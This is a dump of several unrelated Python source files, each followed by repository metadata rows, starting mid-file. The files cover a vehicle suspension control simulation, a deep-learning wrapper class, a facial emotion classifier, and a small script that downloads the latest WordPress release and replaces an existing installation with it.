"""
deriv = np.zeros_like(array)
deriv[0] = array[1] - array[0]
deriv[1:] = np.diff(array)
return deriv * step
# =============================================================================
# Importing values of PID
# =============================================================================
StepPID = pd.read_excel('Scalino.xlsx')
StepPID = np.asarray(StepPID)
ImpulsePID = pd.read_excel('impulso.xlsx')
ImpulsePID = np.asarray(ImpulsePID)
BumpPID = pd.read_excel('BumpPID.xlsx')
BumpPID = np.asarray(BumpPID)
RoughPID = pd.read_excel('Rough.xlsx')
RoughPID = np.asarray(RoughPID)
# =============================================================================
# STATE SPACE REPRESENTATION
# x1 = x_body
# x2 = x_wheel
# x3 = x_body'
# x4 = x_wheel'
# =============================================================================
# Main spring stiffness
k_s = 15000 # N/m
# Sprung mass
m_b = 250 # kg
# Viscous damper
c_s = 1000 # N/(m/s)
# Unsprung mass (wheel)
m_w = 30 # kg
# Tyre stiffness
k_t = 150000 # N/m
# Skyhook damping
c_sky = 1000 # N/(m/s)
# Different road simulations
Impulse = impulse(1000)
Step = step(1000)
Bump = bump()
Rough = rough()
def fuzzySuspensionModel(timeScale, state, road):
x1, x2, x3, x4 = state
fuzzyForce = FLC.FLC(x1 - x2, x3)
xdot1 = x3
xdot2 = x4
xdot3 = (-k_s / m_b * x1 + k_s / m_b * x2 - c_s /
m_b * x3 + c_s / m_b * x4 + 1 / m_b * fuzzyForce)
xdot4 = (k_s / m_w * x1 - (k_t + k_s) / m_w * x2 + c_s / m_w * x3 -
c_s / m_w * x4 + k_t / m_w * road - 1 / m_w * fuzzyForce)
return np.array([xdot1, xdot2, xdot3, xdot4])
def passiveSuspensionModel(timeScale, state, road):
x1, x2, x3, x4 = state
xdot1 = x3
xdot2 = x4
xdot3 = -k_s / m_b * x1 + k_s / m_b * x2 - c_s / m_b * x3 + c_s / m_b * x4
xdot4 = (k_s / m_w * x1 - (k_t + k_s) / m_w * x2 + c_s /
m_w * x3 - c_s / m_w * x4 + k_t / m_w * road)
return np.array([xdot1, xdot2, xdot3, xdot4])
def skyhookSuspensionModel(timeScale, state, road):
x1, x2, x3, x4 = state
xdot1 = x3
xdot2 = x4
xdot3 = (-k_s / m_b * x1 + k_s / m_b * x2 - c_s / m_b * x3 + c_s / m_b * x4
- c_sky / m_b * x3)
xdot4 = (k_s / m_w * x1 - (k_t + k_s) / m_w * x2 + c_s /
m_w * x3 - c_s / m_w * x4 + k_t / m_w * road)
return np.array([xdot1, xdot2, xdot3, xdot4])
# =============================================================================
# ## ODE solution - fuzzy
# =============================================================================
# Step
solStep = ode(fuzzySuspensionModel).set_integrator('dopri5',
atol=1e-6)
state0 = [0, 0, 0, 0]
solStep.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time = []
StepState = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Step')
while solStep.successful() and solStep.t < tFin:
solStep.set_f_params(Step[counter])
solStep.integrate(solStep.t + dt)
StepState.append(solStep.y)
Time.append(solStep.t)
counter += 1
progress.update()
Time = np.asarray(Time)
StepState = np.asarray(StepState)
# Impulse
solImpulse = ode(fuzzySuspensionModel).set_integrator('dopri5',
atol=1e-6)
state0 = [0, 0, 0, 0]
solImpulse.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time = []
ImpulseState = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Impulse')
while solImpulse.successful() and solImpulse.t < tFin:
solImpulse.set_f_params(Impulse[counter])
solImpulse.integrate(solImpulse.t + dt)
ImpulseState.append(solImpulse.y)
Time.append(solImpulse.t)
counter += 1
progress.update()
Time = np.asarray(Time)
ImpulseState = np.asarray(ImpulseState)
# Bump
solBump = ode(fuzzySuspensionModel).set_integrator('dopri5',
atol=1e-6)
state0 = [0, 0, 0, 0]
solBump.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time = []
BumpState = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Bump')
while solBump.successful() and solBump.t < tFin:
solBump.set_f_params(Bump[counter])
solBump.integrate(solBump.t + dt)
BumpState.append(solBump.y)
Time.append(solBump.t)
counter += 1
progress.update()
Time = np.asarray(Time)
BumpState = np.asarray(BumpState)
# Rough road
solRough = ode(fuzzySuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solRough.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time = []
RoughState = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Rough')
while solRough.successful() and solRough.t < tFin:
solRough.set_f_params(Rough[counter])
solRough.integrate(solRough.t + dt)
RoughState.append(solRough.y)
Time.append(solRough.t)
counter += 1
progress.update()
Time = np.asarray(Time)
RoughState = np.asarray(RoughState)
# =============================================================================
# ## ODE solution - passive
# =============================================================================
# Step
solStep2 = ode(passiveSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solStep2.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time2 = []
StepState2 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Step')
while solStep2.successful() and solStep2.t < tFin:
solStep2.set_f_params(Step[counter])
solStep2.integrate(solStep2.t + dt)
StepState2.append(solStep2.y)
Time2.append(solStep2.t)
counter += 1
progress.update()
Time2 = np.asarray(Time2)
StepState2 = np.asarray(StepState2)
# Impulse
solImpulse2 = ode(passiveSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solImpulse2.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time2 = []
ImpulseState2 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Impulse')
while solImpulse2.successful() and solImpulse2.t < tFin:
solImpulse2.set_f_params(Impulse[counter])
solImpulse2.integrate(solImpulse2.t + dt)
ImpulseState2.append(solImpulse2.y)
Time2.append(solImpulse2.t)
counter += 1
progress.update()
Time2 = np.asarray(Time2)
ImpulseState2 = np.asarray(ImpulseState2)
# Bump
solBump2 = ode(passiveSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solBump2.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time2 = []
BumpState2 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Bump')
while solBump2.successful() and solBump2.t < tFin:
solBump2.set_f_params(Bump[counter])
solBump2.integrate(solBump2.t + dt)
BumpState2.append(solBump2.y)
Time2.append(solBump2.t)
counter += 1
progress.update()
Time2 = np.asarray(Time2)
BumpState2 = np.asarray(BumpState2)
# Rough road
solRough2 = ode(passiveSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solRough2.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time2 = []
RoughState2 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Rough')
while solRough2.successful() and solRough2.t < tFin:
solRough2.set_f_params(Rough[counter])
solRough2.integrate(solRough2.t + dt)
RoughState2.append(solRough2.y)
Time2.append(solRough2.t)
counter += 1
progress.update()
Time2 = np.asarray(Time2)
RoughState2 = np.asarray(RoughState2)
# =============================================================================
# ## ODE solution - skyhook
# =============================================================================
# Step
solStep3 = ode(skyhookSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solStep3.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time3 = []
StepState3 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Step')
while solStep3.successful() and solStep3.t < tFin:
solStep3.set_f_params(Step[counter])
solStep3.integrate(solStep3.t + dt)
StepState3.append(solStep3.y)
Time3.append(solStep3.t)
counter += 1
progress.update()
Time3 = np.asarray(Time3)
StepState3 = np.asarray(StepState3)
# Impulse
solImpulse3 = ode(skyhookSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solImpulse3.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time3 = []
ImpulseState3 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Impulse')
while solImpulse3.successful() and solImpulse3.t < tFin:
solImpulse3.set_f_params(Impulse[counter])
solImpulse3.integrate(solImpulse3.t + dt)
ImpulseState3.append(solImpulse3.y)
Time3.append(solImpulse3.t)
counter += 1
progress.update()
Time3 = np.asarray(Time3)
ImpulseState3 = np.asarray(ImpulseState3)
# Bump
solBump3 = ode(skyhookSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solBump3.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time3 = []
BumpState3 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Bump')
while solBump3.successful() and solBump3.t < tFin:
solBump3.set_f_params(Bump[counter])
solBump3.integrate(solBump3.t + dt)
BumpState3.append(solBump3.y)
Time3.append(solBump3.t)
counter += 1
progress.update()
Time3 = np.asarray(Time3)
BumpState3 = np.asarray(BumpState3)
# Rough road
solRough3 = ode(skyhookSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solRough3.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time3 = []
RoughState3 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Rough')
while solRough3.successful() and solRough3.t < tFin:
solRough3.set_f_params(Rough[counter])
solRough3.integrate(solRough3.t + dt)
RoughState3.append(solRough3.y)
Time3.append(solRough3.t)
counter += 1
progress.update()
Time3 = np.asarray(Time3)
RoughState3 = np.asarray(RoughState3)
# =============================================================================
# ACCELERATION EVALUATION (AND FUZZY FORCE)
# =============================================================================
# Step
StepAcc = derivate(StepState[:, 2])
StepAcc2 = derivate(StepState2[:, 2])
StepAcc3 = derivate(StepState3[:, 2])
StepForce = (-k_s * StepState[:, 0] + k_s * StepState[:, 1] -
c_s * StepState[:, 2] + c_s * StepState[:, 3] - StepAcc[:] * m_b)
# Impulse
ImpulseAcc = derivate(ImpulseState[:, 2])
ImpulseAcc2 = derivate(ImpulseState2[:, 2])
ImpulseAcc3 = derivate(ImpulseState3[:, 2])
ImpulseForce = (-k_s * ImpulseState[:, 0] + k_s * ImpulseState[:, 1] -
c_s * ImpulseState[:, 2] + c_s * ImpulseState[:, 3] -
ImpulseAcc[:] * m_b)
# Bump
BumpAcc = derivate(BumpState[:, 2])
BumpAcc2 = derivate(BumpState2[:, 2])
BumpAcc3 = derivate(BumpState3[:, 2])
BumpForce = (-k_s * BumpState[:, 0] + k_s * BumpState[:, 1] -
c_s * BumpState[:, 2] + c_s * BumpState[:, 3] - BumpAcc[:] * m_b)
# Rough
RoughAcc = derivate(RoughState[:, 2])
RoughAcc2 = derivate(RoughState2[:, 2])
RoughAcc3 = derivate(RoughState3[:, 2])
RoughForce = (-k_s * RoughState[:, 0] + k_s * RoughState[:, 1] -
c_s * RoughState[:, 2] + c_s * RoughState[:, 3] -
RoughAcc[:] * m_b)
# =============================================================================
# # PLOTTING
# =============================================================================
# Step
plt.figure(1)
plt.plot(Time, 1e3 * StepState[:, 0], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * StepState2[:, 0], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * StepState3[:, 0], 'C3', label='Skyhook', linewidth=1)
plt.plot(StepPID[:, 0], 1e3 * StepPID[:, 1], 'C4', label='PID', linewidth=1)
plt.plot(Time, 1e3 * Step, 'C0', label='Road', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel('Body displacement [mm]')
plt.legend()
plt.figure(2)
plt.plot(Time, 1e3 * StepState[:, 1], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * StepState2[:, 1], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * StepState3[:, 1], 'C3', label='Skyhook', linewidth=1)
plt.plot(StepPID[:, 0], 1e3 * StepPID[:, 2], 'C4', label='PID', linewidth=1)
plt.xlabel('Time [s]')
plt.ylabel('Unsprung mass displacement [mm]')
plt.legend()
plt.figure(3)
plt.plot(Time, StepAcc, 'C1', label='Fuzzy')
plt.plot(Time2, StepAcc2, 'C2', label='Passive', linewidth=1)
plt.plot(Time3, StepAcc3, 'C3', label='Skyhook', linewidth=1)
plt.plot(StepPID[:, 0], StepPID[:, 3], 'C4', label='PID', linewidth=1)
# plt.plot(Time, StepForce/m_b, 'C0', label='Force', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel(r'Body acceleration [m/${s^2}$]')
plt.legend()
# Impulse
plt.figure(4)
plt.plot(Time, 1e3 * ImpulseState[:, 0], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * ImpulseState2[:, 0], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * ImpulseState3[:, 0], 'C3', label='Skyhook', linewidth=1)
plt.plot(ImpulsePID[:, 0], 1e3 * ImpulsePID[:, 1], 'C4', label='PID', linewidth=1)
plt.plot(Time, 1e3 * Impulse, 'C0', label='Road', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel('Body displacement [mm]')
plt.legend()
plt.figure(5)
plt.plot(Time, 1e3 * ImpulseState[:, 1], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * ImpulseState2[:, 1], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * ImpulseState3[:, 1], 'C3', label='Skyhook', linewidth=1)
plt.plot(ImpulsePID[:, 0], 1e3 * ImpulsePID[:, 2], 'C4', label='PID', linewidth=1)
plt.xlabel('Time [s]')
plt.ylabel('Unsprung mass displacement [mm]')
plt.legend()
plt.figure(6)
plt.plot(Time, ImpulseAcc, 'C1', label='Fuzzy')
plt.plot(Time2, ImpulseAcc2, 'C2', label='Passive', linewidth=1)
plt.plot(Time3, ImpulseAcc3, 'C3', label='Skyhook', linewidth=1)
plt.plot(ImpulsePID[:, 0], ImpulsePID[:, 3], 'C4', label='PID', linewidth=1)
# plt.plot(Time, ImpulseForce/m_b, 'C0', label='Force', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel(r'Body acceleration [m/${s^2}$]')
plt.legend()
# Bump
plt.figure(7)
plt.plot(Time, 1e3 * BumpState[:, 0], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * BumpState2[:, 0], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * BumpState3[:, 0], 'C3', label='Skyhook', linewidth=1)
plt.plot(BumpPID[:, 0], 1e3 * BumpPID[:, 1], 'C4', label='PID', linewidth=1)
plt.plot(Time, 1e3 * Bump, 'C0', label='Road', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel('Body displacement [mm]')
plt.legend()
plt.figure(8)
plt.plot(Time, 1e3 * BumpState[:, 1], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * BumpState2[:, 1], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * BumpState3[:, 1], 'C3', label='Skyhook', linewidth=1)
plt.plot(BumpPID[:, 0], 1e3 * BumpPID[:, 2], 'C4', label='PID', linewidth=1)
plt.xlabel('Time [s]')
plt.ylabel('Unsprung mass displacement [mm]')
plt.legend()
plt.figure(9)
plt.plot(Time, BumpAcc, 'C1', label='Fuzzy')
plt.plot(Time2, BumpAcc2, 'C2', label='Passive', linewidth=1)
plt.plot(Time3, BumpAcc3, 'C3', label='Skyhook', linewidth=1)
plt.plot(BumpPID[:, 0], BumpPID[:, 3], 'C4', label='PID', linewidth=1)
# plt.plot(Time, BumpForce/m_b, 'C0', label='Force', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel(r'Body acceleration [m/${s^2}$]')
plt.legend()
# Rough
plt.figure(10)
plt.plot(Time, 1e3 * RoughState[:, 0], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * RoughState2[:, 0], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * RoughState3[:, 0], 'C3', label='Skyhook', linewidth=1)
plt.plot(RoughPID[:, 0], 1e3 * RoughPID[:, 1], 'C4', label='PID', linewidth=1)
plt.plot(Time, 1e3 * Rough, 'C0', label='Road', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel('Body displacement [mm]')
plt.legend()
plt.figure(11)
plt.plot(Time, 1e3 * RoughState[:, 1], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * RoughState2[:, 1], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * RoughState3[:, 1], 'C3', label='Skyhook', linewidth=1)
plt.plot(RoughPID[:, 0], 1e3 * RoughPID[:, 2], 'C4', label='PID', linewidth=1)
plt.xlabel('Time [s]')
plt.ylabel('Unsprung mass displacement [mm]')
plt.legend()
plt.figure(12)
plt.plot(Time, RoughAcc, 'C1', label='Fuzzy')
plt.plot(Time2, RoughAcc2, 'C2', label='Passive', linewidth=1)
plt.plot(Time3, RoughAcc3, 'C3', label='Skyhook', linewidth=1)
plt.plot(RoughPID[:, 0], RoughPID[:, 3], 'C4', label='PID', linewidth=1)
# plt.plot(Time, RoughForce/m_b, 'C0', label='Force', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel(r'Body acceleration [m/${s^2}$]')
plt.legend()
# =============================================================================
# RESULTS
# =============================================================================
# Calculation of RMS for:
# (1) Body displacement
# (2) Body accelaration
# (3) Wheel hop (unsprung mass displacement)
#StepFuzzyRMS = np.array([
# RMS(StepState[:, 0]),
# RMS(StepAcc),
# RMS(StepState[:, 1])
# ])
#
#StepPassiveRMS = np.array([
# RMS(StepState2[:, 0]),
# RMS(StepAcc2),
# RMS(StepState2[:, 1])
# ])
#
#StepSkyhookRMS = np.array([
# RMS(StepState3[:, 0]),
# RMS(StepAcc3),
# RMS(StepState3[:, 1])
# ])
#
#StepResult = np.array([
# (StepFuzzyRMS - StepPassiveRMS) / StepPassiveRMS,
# (StepSkyhookRMS - StepPassiveRMS) / StepPassiveRMS,
# ]) * 100
#
#ImpulseFuzzyRMS = np.array([
# RMS(ImpulseState[:, 0]),
# RMS(ImpulseAcc),
# RMS(ImpulseState[:, 1])
# ])
#
#ImpulsePassiveRMS = np.array([
# RMS(ImpulseState2[:, 0]),
# RMS(ImpulseAcc2),
# RMS(ImpulseState2[:, 1])
# ])
#
#ImpulseSkyhookRMS = np.array([
# RMS(ImpulseState3[:, 0]),
# RMS(ImpulseAcc3),
# RMS(ImpulseState3[:, 1])
# ])
#
#ImpulseResult = np.array([
# (ImpulseFuzzyRMS - ImpulsePassiveRMS) / ImpulsePassiveRMS,
# (ImpulseSkyhookRMS - ImpulsePassiveRMS) / ImpulsePassiveRMS
# ]) * 100
#
#BumpFuzzyRMS = np.array([
# RMS(BumpState[:, 0]),
# RMS(BumpAcc),
# RMS(BumpState[:, 1])
# ])
#
#BumpPassiveRMS = np.array([
# RMS(BumpState2[:, 0]),
# RMS(BumpAcc2),
# RMS(BumpState2[:, 1])
# ])
#
#BumpSkyhookRMS = np.array([
# RMS(BumpState3[:, 0]),
# RMS(BumpAcc3),
# RMS(BumpState3[:, 1])
# ])
#
#BumpResult = np.array([
# (BumpFuzzyRMS - BumpPassiveRMS) / BumpPassiveRMS,
# (BumpSkyhookRMS - BumpPassiveRMS) / BumpPassiveRMS
# ]) * 100
RoughFuzzyRMS = np.array([
RMS(RoughState[:, 0] - Rough),
RMS(RoughAcc),
RMS(RoughState[:, 1] - Rough)
])
RoughPassiveRMS = np.array([
RMS(RoughState2[:, 0] - Rough),
RMS(RoughAcc2),
RMS(RoughState2[:, 1] - Rough)
])
RoughSkyhookRMS = np.array([
RMS(RoughState3[:, 0] - Rough),
RMS(RoughAcc3),
RMS(RoughState3[:, 1] - Rough)
])
RoughPIDRMS = np.array([
RMS(RoughPID[:, 1] - Rough[:-1]),
RMS(RoughPID[:, 3]),
RMS(RoughPID[:, 2] - Rough[:-1])
])
RoughResult = np.array([
(RoughFuzzyRMS - RoughPassiveRMS) / RoughPassiveRMS,
(RoughSkyhookRMS - RoughPassiveRMS) / RoughPassiveRMS,
(RoughPIDRMS - RoughPassiveRMS) / RoughPassiveRMS
]) * 100
#RoughResult = np.array([
# (RoughFuzzyRMS - RMS(Rough)) / RMS(Rough),
# (RoughSkyhookRMS - RMS(Rough)) / RMS(Rough),
# (RoughPIDRMS - RMS(Rough)) / RMS(Rough)
# ]) * 100
# =============================================================================
# FFT ANALYSIS
# =============================================================================
label = ['Fuzzy', 'Passive', 'Skyhook', 'PID']
colors = ['C1', 'C2', 'C3', 'C4']
i = 0
for acc in [StepAcc, StepAcc2, StepAcc3, StepPID[:, 3]]:
fft = np.fft.fft(acc)
freq = np.fft.fftfreq(len(acc), 0.01)
plt.figure(13)
plt.loglog(np.abs(freq), np.abs(fft), colors[i], label=label[i],
linewidth=1)
i += 1
plt.legend()
plt.xlabel('Frequency [Hz]')
plt.ylabel('Acceleration')
plt.title('Step')
i = 0
for acc in [ImpulseAcc, ImpulseAcc2, ImpulseAcc3, ImpulsePID[:, 3]]:
fft = np.fft.fft(acc)
freq = np.fft.fftfreq(len(acc), 0.01)
plt.figure(14)
plt.loglog(np.abs(freq), np.abs(fft), colors[i], label=label[i],
linewidth=1)
i += 1
plt.legend()
plt.xlabel('Frequency [Hz]')
plt.ylabel('Acceleration')
plt.title('Impulse')
i = 0
for acc in [BumpAcc, BumpAcc2, BumpAcc3]:
fft = np.fft.fft(acc)
freq = np.fft.fftfreq(len(acc), 0.01)
plt.figure(15)
plt.loglog(np.abs(freq), np.abs(fft), colors[i],
label=label[i], linewidth=1)
i += 1
plt.legend()
plt.xlabel('Frequency [Hz]')
plt.ylabel('Acceleration')
plt.title('Bump')
i = 0
for acc in [RoughAcc, RoughAcc2, RoughAcc3]:
fft = np.fft.fft(acc)
freq = np.fft.fftfreq(len(acc), 0.01)
plt.figure(16)
plt.loglog(np.abs(freq), np.abs(fft),colors[i],
label=label[i], linewidth=1)
i += 1
plt.legend()
plt.xlabel('Frequency [Hz]')
plt.ylabel('Acceleration')
plt.title('Rough')
| 29.73253
| 82
| 0.56678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,148
| 0.289651
|
8bae7f55a261a7c3c248850c794f2efd73be536a
| 950
|
py
|
Python
|
pywatts/modules/wrappers/dl_wrapper.py
|
KIT-IAI/pyWATTS
|
68993bb51ff272c1a98add31e2b537b63e9d0848
|
[
"MIT"
] | 30
|
2020-10-04T17:32:58.000Z
|
2022-03-18T15:06:39.000Z
|
pywatts/modules/wrappers/dl_wrapper.py
|
KIT-IAI/pyWATTS
|
68993bb51ff272c1a98add31e2b537b63e9d0848
|
[
"MIT"
] | 123
|
2020-10-26T14:42:12.000Z
|
2022-03-31T09:15:55.000Z
|
pywatts/modules/wrappers/dl_wrapper.py
|
KIT-IAI/pyWATTS
|
68993bb51ff272c1a98add31e2b537b63e9d0848
|
[
"MIT"
] | 7
|
2020-10-21T15:13:43.000Z
|
2022-03-07T15:47:49.000Z
|
# pylint: disable=W0223
# Pylint cannot handle abstract subclasses of abstract base classes
from abc import ABC
import xarray as xr
from pywatts.modules.wrappers.base_wrapper import BaseWrapper
class DlWrapper(BaseWrapper, ABC):
"""
Super class for deep learning framework wrappers
:param model: The deep learning model
:param name: The name of the wrappers
:type name: str
:param fit_kwargs: The fit keyword arguments necessary for fitting the model
:type fit_kwargs: dict
"""
def __init__(self, model, name, fit_kwargs=None):
super().__init__(name)
self.model = model
if fit_kwargs is None:
fit_kwargs = {}
self.fit_kwargs = fit_kwargs
self.compiled = False
@staticmethod
def _to_dl_input(data: xr.Dataset):
result = {}
for dv in data.data_vars:
da = data[dv]
result[dv] = da.values
return result
| 26.388889
| 80
| 0.656842
| 751
| 0.790526
| 0
| 0
| 190
| 0.2
| 0
| 0
| 367
| 0.386316
|
8baf2837359bef97c791a3fa5aa72048d1181a43
| 590
|
py
|
Python
|
examples/parallel_spectra.py
|
zhaonat/py-maxwell-fd3d
|
bfa4fb826401b98371fdd9306c5fee2e74e7e545
|
[
"MIT"
] | 3
|
2022-01-21T03:53:25.000Z
|
2022-01-23T04:54:43.000Z
|
examples/parallel_spectra.py
|
Guowu-Mcgill/py-maxwell-fd3d
|
bfa4fb826401b98371fdd9306c5fee2e74e7e545
|
[
"MIT"
] | null | null | null |
examples/parallel_spectra.py
|
Guowu-Mcgill/py-maxwell-fd3d
|
bfa4fb826401b98371fdd9306c5fee2e74e7e545
|
[
"MIT"
] | 1
|
2022-01-23T04:54:47.000Z
|
2022-01-23T04:54:47.000Z
|
import os,sys
Nthread = 1
os.environ["OMP_NUM_THREADS"] = str(Nthread) # export OMP_NUM_THREADS=1
os.environ["OPENBLAS_NUM_THREADS"] = str(Nthread) # export OPENBLAS_NUM_THREADS=1
os.environ["MKL_NUM_THREADS"] = str(Nthread) # export MKL_NUM_THREADS=1
os.environ["VECLIB_MAXIMUM_THREADS"] = str(Nthread) # export VECLIB_MAXIMUM_THREADS=1
os.environ["NUMEXPR_NUM_THREADS"] = str(Nthread) # export NUMEXPR_NUM_THREADS=1
## generate spectrum, which requires several simulations...using mip4py
# test system will initially be a fabry-perot slab, since the spectrum is analytically determinable
| 59
| 99
| 0.798305
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 417
| 0.70678
|
8bb10d5482f7eb91428767e4939740b77a7d3702
| 2,386
|
py
|
Python
|
Emotional-Recognition-Facial/create_training_classification_set.py
|
ductai199x/No-more-bad-days
|
ceb7da2d2464062ad4aea028cdfa98380661702c
|
[
"Apache-2.0"
] | 1
|
2018-01-18T15:10:40.000Z
|
2018-01-18T15:10:40.000Z
|
Emotional-Recognition-Facial/create_training_classification_set.py
|
ductai199x/No-more-bad-days
|
ceb7da2d2464062ad4aea028cdfa98380661702c
|
[
"Apache-2.0"
] | null | null | null |
Emotional-Recognition-Facial/create_training_classification_set.py
|
ductai199x/No-more-bad-days
|
ceb7da2d2464062ad4aea028cdfa98380661702c
|
[
"Apache-2.0"
] | null | null | null |
import cv2
import glob
import random
import numpy as np
emotions = ["neutral", "anger", "disgust", "happy", "surprise"]
fishface = cv2.face.FisherFaceRecognizer_create() #Initialize fisher face classifier
data = {}
def get_files(emotion): #Define function to get file list, randomly shuffle it and split 80/20
training_files = glob.glob("dataset//%s//*" %emotion)
test_files = glob.glob("testset//%s//*" %emotion)
random.shuffle(training_files)
training = training_files[:int(len(training_files)*1.0)] #get first 80% of file list
prediction = test_files[-int(len(test_files)*1.0):] #get last 20% of file list
return training, prediction
def make_sets():
training_data = []
training_labels = []
prediction_data = []
prediction_labels = []
for emotion in emotions:
training, prediction = get_files(emotion)
#Append data to training and prediction list, and generate labels 0-7
for item in training:
image = cv2.imread(item) #open image
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) #convert to grayscale
training_data.append(gray) #append image array to training data list
training_labels.append(emotions.index(emotion))
for item in prediction: #repeat above process for prediction set
image = cv2.imread(item)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
prediction_data.append(gray)
prediction_labels.append(emotions.index(emotion))
return training_data, training_labels, prediction_data, prediction_labels
def run_recognizer():
training_data, training_labels, prediction_data, prediction_labels = make_sets()
print "training fisher face classifier"
print "size of training set is:", len(training_labels), "images"
fishface.train(training_data, np.asarray(training_labels))
print "predicting classification set"
cnt = 0
correct = 0
incorrect = 0
for image in prediction_data:
pred, conf = fishface.predict(image)
if pred == prediction_labels[cnt]:
correct += 1
cnt += 1
else:
cv2.imwrite("difficult//%s_%s_%s.jpg" %(emotions[prediction_labels[cnt]], emotions[pred], cnt), image) #<-- this one is new
incorrect += 1
cnt += 1
return ((100*correct)/(correct + incorrect))
#Now run it
metascore = []
for i in range(0,10):
correct = run_recognizer()
print "got", correct, "percent correct!"
metascore.append(correct)
print "\n\nend score:", np.mean(metascore), "percent correct!"
| 33.605634
| 129
| 0.731769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 624
| 0.261526
|
8bb228a7e4380e3d2e78dff77a6e5e75257a88f3
| 1,109
|
py
|
Python
|
main.py
|
Zlobin/wp-updater
|
e10ebbb7ddd2a2398c7a660d134ce8598738fe7d
|
[
"MIT"
] | null | null | null |
main.py
|
Zlobin/wp-updater
|
e10ebbb7ddd2a2398c7a660d134ce8598738fe7d
|
[
"MIT"
] | null | null | null |
main.py
|
Zlobin/wp-updater
|
e10ebbb7ddd2a2398c7a660d134ce8598738fe7d
|
[
"MIT"
] | null | null | null |
# python3 main.py
import urllib.request
import zipfile
import os
import shutil
# @TODO change it
# eg.: /var/www/blog
OLD_WP_PATH = ''
NEW_WP_PATH_TMP = ''
if not (os.path.exists(OLD_WP_PATH)) or not (os.path.exists(NEW_WP_PATH_TMP)):
os._exit(0)
WP_URL = 'http://wordpress.org/latest.zip'
EXTRACTED_NAME = 'wordpress'
NEW_WP_PATH = os.path.join(NEW_WP_PATH_TMP, EXTRACTED_NAME)
# Download the file from url, save it in a temporary directory and get the
# path to it (e.g. '/tmp/tmpb43hma') in the `wp_archve` variable:
wp_archive, headers = urllib.request.urlretrieve(WP_URL)
with zipfile.ZipFile(wp_archive, 'r') as zf:
zf.extractall(NEW_WP_PATH_TMP)
os.remove(wp_archive)
# Remove new files
shutil.rmtree(os.path.join(NEW_WP_PATH, 'wp-content'))
os.remove(os.path.join(NEW_WP_PATH, 'readme.html'))
# Copy content to the new WP
shutil.copy2(os.path.join(OLD_WP_PATH, 'wp-config.php'), NEW_WP_PATH)
shutil.copytree(os.path.join(OLD_WP_PATH, 'wp-content'), os.path.join(NEW_WP_PATH, 'wp-content'))
shutil.rmtree(OLD_WP_PATH)
shutil.copytree(NEW_WP_PATH, OLD_WP_PATH)
shutil.rmtree(NEW_WP_PATH)
| 27.04878
| 97
| 0.757439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 354
| 0.319206
|
8bb2c815f8cb9c7313bf196f810ccfc535e6256b
| 435
|
py
|
Python
|
